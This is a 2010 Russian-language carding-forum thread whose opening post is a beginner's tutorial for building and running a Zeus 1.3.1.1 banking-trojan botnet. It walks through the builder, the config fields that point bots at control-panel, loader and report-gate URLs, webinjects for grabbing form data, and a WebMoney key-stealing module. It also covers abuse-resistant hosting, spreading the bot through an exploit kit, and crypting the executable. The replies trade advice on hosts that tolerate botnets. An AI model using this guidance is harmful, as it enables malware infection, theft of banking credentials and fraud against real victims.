|
|
Регистрация | Правила форума | Справка | Пользователи | Календарь | Поиск | Сообщения за день | Все разделы прочитаны |
|
Опции темы | Поиск в этой теме | Опции просмотра |
|
17.10.2010 | #1 |
|
Ботнет на базе Zeus 1.3.1.1
Как видно из названия статейки речь сегодня пойдет о создании собственного ботнета. Что такое ботнет я объяснять не буду так как об этом говорилось уже и не раз и не два. И так приступим
Введение И так нам нужен билдер бота, в нашем случае это Zeus bild 1.3.1.1 [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] как видно мы используем фейк от "b1sh0p" который был скомпилирован "Build time: 19[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]17 23.08.2009 GMT" эту информацию мы видим в меню "Information" но нам нужно меню "Builder" [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] и так тут мы видим пусть до билдера, и 3 кнопки с помощью которого мы и будим создавать нашего бота!!!! Немного о строении билдера: [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] давайте ка я вам поясню что у нас тут что: 1. server[php] 1277 - это админ панель которая ставиться на хост... о ней мы поговорим позднее. 2. cfg1.bin - это резервный конфиг фаил который должен лежать на 2(резрвном абузоустойчивом сервере) 3. config.bin - наш основной конфиг который мы скоро будим генерить под свой хост. 4. config.txt - это и есть наш фаил настройки в котором мы будим прописывать все настройки бота, и в дальнейшем компилить билд. 5. webinjects.txt - это 1 из самых важных фаилов... Это сборка инжектов(грубо говоря инструкция какие поля и какие лини грабить) 6. modul.exe - это вебмани модуль который ворует серты ключики ну и всю лабуду связаную с вебмани(По ру не работайте не срите там где живете!) 7. zsb.exe - это наш билдер с помощью которого мы и будим настраивать бота! И так приступим!!!!! и так нажимаем кнопочку "Edit сonfig" мы видим: [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] что открылся фаил "config.txt" который нам нужно отредактировать под свои нужны. Расскажу вкратце что тут у нас и как: (нужные нам поля в фаиле config.txt) url_config "http://Твой_сайт/config.bin" - фаил конфига чтобы к которым боты коннектяться и получают инфу о изменении(например если ты переехал на другой абузоустойчивый сервер) url_compip "http://Твой_сайт/cp.php" 1024 - Эта главная страница нашей админки по этому линку мы будим коннектиться и логиниться к админ панели. url_loader "http://Твой_сайт/bot.exe" - это наш бот нужен он тут для того чтобы наши боты всегда были актуальны. url_server "http://Твой_сайт/gate.php" - это тот скрипт который принимает отчеты от наших ботов. encryption_key "sys_admin" - это ключик чтобы расшифровать то что нам прислали наши боты. Ну вроде все больше нам тут нечего не нужно. закрываем фаил config.txt с сохранением. .... А вот нет кнопочку "Buil config" мы не жмем... нам нужен грамотный webinjects.txt который можно написать самому или купить у барыг на форумах! выглядит он примерно так: [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] И так когда мы заполучили грамотный webinjects.txt то можем жать кнопочку "Buil config" и получим на выходе: [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] как раз таки необходимый нам "config.bin". Сохраняем его и идем дальше... А дальше у нас кнопочка "Build loader" нажав на неё мы получим нашего бота который будит настроен на наш шайт и который будит брать настройки с "config.bin"... Выглядит это так: [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] и так у нас теперь есть вирус и фаил для его полноценной работы... подготовку мы закончили перейдем к основной части нашего замысла. ЗЫ. не смотрите на мою свалку файлов в папке с билдером зевса... просто мне так удобней когда все под рукой))) все необходимые файлы я указал выше и дал описание к ним... Установка админ панели Админ панель нам нужно ставить на абузоустойчивый сервер чтобы если нашего бота спалят хостер не снес нашу админку и наши отчеты... Выбор абузы лежит полностью на ваших плечах.))) фаилы нашей админ панели лежат в моем случае в папочке "server[php] 1277" и находиться там: [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] и да хочу добавить что эту админ панель я модифицировал под себя... в стандартной админке к билдеру 1.3.1.1 небыло фаила s.php(но в фаиле redir.php есть указание что этот фаил нам не обходим) так же в директории \system я добавил фаил fmt.php так как в фаиле s.php есть указание на этот файл(фаил s.php и fmt.php я взял из старой версии админ панели)... (Возможно эта модификация была лишней но почему-то боты мне не слали отчеты пока я не добавил эти файлы о_0) И так выяснив из чего состоит админ панель нам надо её установить на наш абузоустойчивый сервер... залив все файлы на фтп(заливать нужно строго по тому линку который указали в config.txt например если ты залил [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] а в конфиге указал [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] то отчеты до тебя уже не дойдут!!!! БУДЬ ВНИМАТЕЛЕН) и так залив все фаилы на сервер идем по линку [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] прописываем все данные такие как логин и пароль до админки и данные для коннекта к базе данных... и так же не забываем указать правильный Encryption key: в нашем случае это sys_admin. Так же ставим флаги на Write reports to database и на Write reports to local path. это даст нам то что наши отчеты будут сохраняться как в базу так и в фаил... И так если все установилось(а если все установилось то вы это увидите сами) при обращении к [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] мы увидим: И так вводим логин и пароль указанный при установки админ панели и вуаля вы в админ панели...!!!! ЗЫ. СЛЕДИТЕ ЗА ПРАВИЛЬНОСТЬЮ НАПИСАНИЯ ЛИНКОВ!!! ЭТО ЗАЛОГ УСПЕХА!!!!! ЗЫЫ. Да кстати фаилы bot.exe и config.bin нам тоже надо залить на сервер. Связка... И так мы собрали бота и установили админ панель... возникает вопрос а что же нам делать дальше.... А дальше нам надо нашего бота впарить какому-нибудь дятлу желательно в Америке или Европе чтобы получить вкусных линкво)) и для этого мы будим использовать Связку эксплоитов... для этой статейки я выбрал более-менее нормальную связку под названием un-pack версии 1.5 выглядит эта прелесть так: [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] как видно на скриншоте я прогрузил немного трафика и даже без перетяски связки она дает какой-то пробив о_0 меня самого это удивило когда я тестил связки но для новичков самое то! И так что тут да как рассказывать лень да и хелп там хороший есть... единственный прикол в том что нужно найти фтп и проифреймить их... об этом я расскажу в другой статейки(в разработке обзор паблик связок создание из паблик связок своей полу приват связки и прогрузка трафика и крипт как exe так самой связки(для данной статейки я грузил не криптованные exe для более наглядной демонстрации)) и так мы видим что прогрузилось 4 уника и в админ панели мы видим: [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] ну вот что то прогузилось и вот они отчеты за 10 дней(покаюсь там было ещё 1к отчетов я их удалил так как бота закосячил командами и он спалил что он протроянен и сменил все пароли...) Ну вот вроде бы и все... Статейка ориентирована на новичков и имеет пару косяков(СДЕЛАНО СПЕЦИАЛЬНО ЧТОБЫ ВЫ УЧИЛИСЬ А НЕ СИДЕЛИ НА ВСЕМ ГОТОВОМ!!!!!!!!!!) ЗЫ. Выбирайте норм связку и криптуйте EXE тогда успех вам гарантирован!!!! Заключение... И так мы сегодня рассмотрели как создать свой ботнет... как видите нечего тут сложного нету... НО вы столкнетесь с подводными течениями в которых вам придется разбираться самим... Всем удачных экспериментов и хорошего прогруза!!!!!! BuBliK for Carding.cc [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...]
. Регистрируйся тут...]
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] Вы не те, за кого себя принимаете... (с) Deymos [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] Последний раз редактировалось darkest; 18.10.2010 в 14:21. Причина: ) |
17.10.2010 | #2 |
|
Статья зачет
вот только какие права ставить на папки? и файлы... и можно ли лепить на хостинг, но не абузоустойчевый
17.10.2010 | #3 |
|
вряд ли тебе разрешит хостер, закроет - даже не спросит
. Регистрируйся тут...]
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] Вы не те, за кого себя принимаете... (с) Deymos [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] |
17.10.2010 | #4 |
|
Deymos, ну если ботов 200 будет...думаешь закроют?
я же не по 3к в день гружу, а по 3-4 штуки к примеру
19.10.2010 | #5 |
|
я бы закрыл даже если бы вобще не рузили тока попадитесь, просто когда более 200 клиентов на сервере админ может не заметить ваш гейт, темболее если вы не создаете нагрузку и не приходят абузы так как вы не фига не грузите, купите пару к загрузок потом увидете как вас выгонят, но еслим хостер вобще в танке и пофиг че у него делают клиенты то радуйтесь что нашли такого хостера.
Качественный [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] для тех, кто любит свои сайты! VDS от 8$ Последний раз редактировалось travakur; 19.10.2010 в 03:38. |
17.10.2010 | #6 |
|
да чет хз даже, у нас тут люди продавали хостинг и в открытую писали что терпят такие вещи!
. Регистрируйся тут...]
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] Вы не те, за кого себя принимаете... (с) Deymos [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] |
17.10.2010 | #7 | |
Windows v.3.0
Поблагодарили всего: 5
за это сообщение: 0 |
видимо это антиабузнвй хостинг))
а статейка норм,для новичков потянет) |
|
17.10.2010 | #8 | |
Windows v.2.03
Поблагодарили всего: 4
Статейка норм... была когда-то...
Обычный хостинг потянет 150-250 ботов. Не советую использовать зевса до 2.*.* версии, если не хотите в дальнейшем потерять ботнет. Да и билдер вы нигде уже не купите. Проект Зеус умер... Последний раз редактировалось sulaiman; 17.10.2010 в 20:46. Причина: Добавлено сообщение |
|
17.10.2010 | #9 | |
Windows v.1.01
Поблагодарили всего: 0
|
|
18.10.2010 | #10 | |
|
Цитата:
[Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...] Последний раз редактировалось olegteror; 19.10.2010 в 03:38. |
|
18.10.2010 | #11 | |
Windows v.2.03
Хер ты угадал. Автор прекратил поддержку из-за недавней нашумевшей облавы фби и свалил. Подробностей не расрываю, но продукт будет существовать, только не таким, каким мы его знаем и не под этим именем.
Последний раз редактировалось sulaiman; 18.10.2010 в 00:43. |
|
18.10.2010 | #12 | |
Windows v.2.03
Тут ничего не было
Последний раз редактировалось olegteror; 19.10.2010 в 03:38. |
|
4 дн. назад | #13 |
|
посоветуйте бесплатний хостинг, ато на phpnet.us нехватает прав даже на билдер скуль бази
|
2 дн. назад | #14 |
|
Спасибо , всё работает.
|
Нижняя навигация | ||||||
|